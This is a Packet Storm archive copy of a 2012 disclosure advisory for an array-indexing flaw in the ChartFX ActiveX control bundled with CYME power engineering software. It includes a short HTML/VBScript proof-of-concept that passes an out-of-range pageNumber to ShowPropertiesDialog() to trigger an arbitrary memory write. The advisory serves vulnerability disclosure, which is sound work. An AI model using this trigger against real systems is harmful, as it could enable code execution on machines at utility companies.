Twenty Year Anniversary

Cyme ChartFX Client Server Array Indexing

Cyme ChartFX Client Server Array Indexing
Posted Oct 4, 2012
Authored by Francis Provencher

Cyme ChartFX client server suffers from a vulnerability that is caused due to an indexing error in the "ShowPropertiesDialog()" method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be exploited to write a single byte value to an arbitrary memory location via the "pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.

tags | exploit, arbitrary, activex
MD5 | 7be0aa597f9b41970f0552f4257aa127

Cyme ChartFX Client Server Array Indexing

Change Mirror Download
#####################################################################################

Application: CYME Power Engineering Software

Platforms: Windows
Version: CYME version 5.0.12.663.

Secunia: SA48430

{PRL}: 2012-29

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

The CYME Power Engineering software is a suite of applications composed of a network editor, analysis
modules and user-customizable model libraries from which you can choose to get the most powerful solution.

The modules available comprise a variety of advanced applications and extensive libraries for either
transmission/industrial or distribution power network analysis.

(http://www.cyme.com/software/)

This software is use by all major electrical production/distrubtion company
http://www.cyme.com/company/clients/

#####################################################################################

============================
2) Report Timeline
============================

2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)


#####################################################################################

============================
3) Technical details
============================
The vulnerability is caused due to an indexing error in the "ShowPropertiesDialog()"
method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be
exploited to write a single byte value to an arbitrary memory location via the
"pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.


#####################################################################################

===========
4) The Code
===========
<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>
targetFile = "C:\CYME\CYMDIST50TRIAL\ChartFX.ClientServer.Core.dll"
prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
memberName = "ShowPropertiesDialog"
progid = "Cfx62ClientServer.Chart"
argCount = 2

arg1="defaultV"
arg2=2147483647

target.ShowPropertiesDialog arg1 ,arg2

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close